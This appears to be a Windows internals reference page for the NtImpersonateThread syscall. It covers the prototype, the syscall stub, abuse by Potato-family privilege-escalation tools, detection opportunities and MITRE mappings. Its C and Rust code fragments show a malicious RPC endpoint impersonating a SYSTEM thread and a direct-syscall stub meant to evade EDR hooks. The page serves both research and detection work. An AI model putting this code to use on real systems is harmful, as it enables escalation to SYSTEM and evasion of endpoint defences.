NtImpersonateThread

Prototype

NTSTATUS NtImpersonateThread(
  HANDLE                       ServerThreadHandle,
  HANDLE                       ClientThreadHandle,
  PSECURITY_QUALITY_OF_SERVICE SecurityQos
);

Arguments

Syscall IDs by Windows version

Syscall stub

4C 8B D1            mov r10, rcx
B8 06 01 00 00      mov eax, 0x106
F6 04 25 08 03 FE 7F 01   test byte ptr [0x7FFE0308], 1
75 03               jne short +3
0F 05               syscall
C3                  ret
CD 2E               int 2Eh
C3                  ret

Undocumented notes

NtImpersonateThread is the *direct* thread-to-thread impersonation primitive — no intermediate token handle required. It is what the LRPC / ALPC server runtime invokes when an RPC method declares `[in] handle_t` and the caller is privileged enough to be impersonated. Unlike the token-handle approach (NtOpenProcessTokenEx -> NtDuplicateToken -> NtSetInformationThread), this single call captures the client thread's effective security context atomically. The SSN drifts every couple of builds — `0xEE` on Windows 10 1507, `0x106` on Windows 11 24H2 — so dynamic SSN resolution is required for portable tooling.

Common malware usage

The kernel-side soul of the entire **Potato family** (HotPotato, RottenPotato, JuicyPotato, RoguePotato, PrintSpoofer, SweetPotato, RemotePotato0, GodPotato). The attack pattern: trick a SYSTEM-context service (Print Spooler, MSDTC, RPCSS, BITS) into making an authenticated RPC call to a local malicious endpoint; the malicious endpoint then calls `NtImpersonateThread(NtCurrentThread, callerThread, &qos{SecurityImpersonation})` to capture the SYSTEM context. With `SeImpersonatePrivilege` already granted to most service accounts (LOCAL SERVICE, NETWORK SERVICE, IIS app-pool identities), this single primitive bridges SERVICE -> SYSTEM. The exact same call is used by Cobalt Strike's `make_token` BOF variants when impersonating a target thread directly rather than a process token.

Detection opportunities

High-fidelity detection target. Windows Security Event **4624 with Logon Type 3** + impersonation level `Impersonation` (3) or `Delegation` (4) records the resulting security context change. Most importantly, the ETW provider `Microsoft-Windows-RPC` emits `EVENT_ID 5` (RpcServerImpersonateClient) on the RPC server side — correlating an unexpected RPC server impersonating a high-privilege client is the canonical Potato detection. Event **4673** (Sensitive Privilege Use, SeImpersonatePrivilege) fires when the privilege is exercised. EDRs hook `ntdll!NtImpersonateThread`; direct syscalls bypass that but the kernel-side audit trail and the RPC ETW are unaffected. Watch for non-IIS, non-print-spooler, non-MSDTC processes invoking this against threads they didn't spawn.

Direct syscall examples

; NOTE: SSN moves every build — resolve dynamically for portability.
NtImpersonateThread PROC
    mov  r10, rcx          ; ServerThreadHandle
    mov  eax, 106h         ; SSN on Win11 24H2
    syscall
    ret
NtImpersonateThread ENDP

// Inside a malicious local RPC endpoint reached by a coerced SYSTEM service.
// The current thread is servicing the RPC; the caller's thread carries SYSTEM context.
SECURITY_QUALITY_OF_SERVICE qos = {
    .Length = sizeof(qos),
    .ImpersonationLevel = SecurityImpersonation,
    .ContextTrackingMode = SECURITY_STATIC_TRACKING,
    .EffectiveOnly = FALSE,
};

// hClientThread was obtained via RpcImpersonateClient + OpenThread on the caller,
// or directly from an LPC port message.
NTSTATUS s = NtImpersonateThread(NtCurrentThread(),
                                 hClientThread,
                                 &qos);
if (NT_SUCCESS(s)) {
    // We are now SYSTEM on this thread. CreateProcessAsUserW with the duplicated
    // token gives us a SYSTEM-context cmd.exe.
    HANDLE hTok;
    NtOpenThreadTokenEx(NtCurrentThread(),
                        TOKEN_DUPLICATE | TOKEN_QUERY | TOKEN_ASSIGN_PRIMARY,
                        TRUE, 0, &hTok);
    // ... NtDuplicateToken -> CreateProcessAsUserW("cmd.exe")
}

// Direct-syscall NtImpersonateThread used inside a Potato-style RPC server.
use std::arch::asm;
use windows_sys::Win32::Foundation::HANDLE;
use windows_sys::Win32::Security::SECURITY_QUALITY_OF_SERVICE;

#[unsafe(naked)]
pub unsafe extern "system" fn nt_impersonate_thread(
    _server: HANDLE,
    _client: HANDLE,
    _qos: *mut SECURITY_QUALITY_OF_SERVICE,
) -> i32 {
    asm!(
        "mov r10, rcx",
        "mov eax, 0x106",      // Win11 24H2; resolve dynamically in real loaders
        "syscall",
        "ret",
        options(noreturn),
    );
}

// Higher-level helper kept short for clarity.
pub unsafe fn become_caller(server: HANDLE, client: HANDLE) -> bool {
    let mut qos = SECURITY_QUALITY_OF_SERVICE {
        Length: std::mem::size_of::<SECURITY_QUALITY_OF_SERVICE>() as u32,
        ImpersonationLevel: 2, // SecurityImpersonation
        ContextTrackingMode: 0, // STATIC
        EffectiveOnly: 0,
    };
    nt_impersonate_thread(server, client, &mut qos) == 0
}

MITRE ATT&CK mappings

• T1134Access Token Manipulation
• T1134.001Token Impersonation/Theft
• T1134.003Make and Impersonate Token
• T1106Native API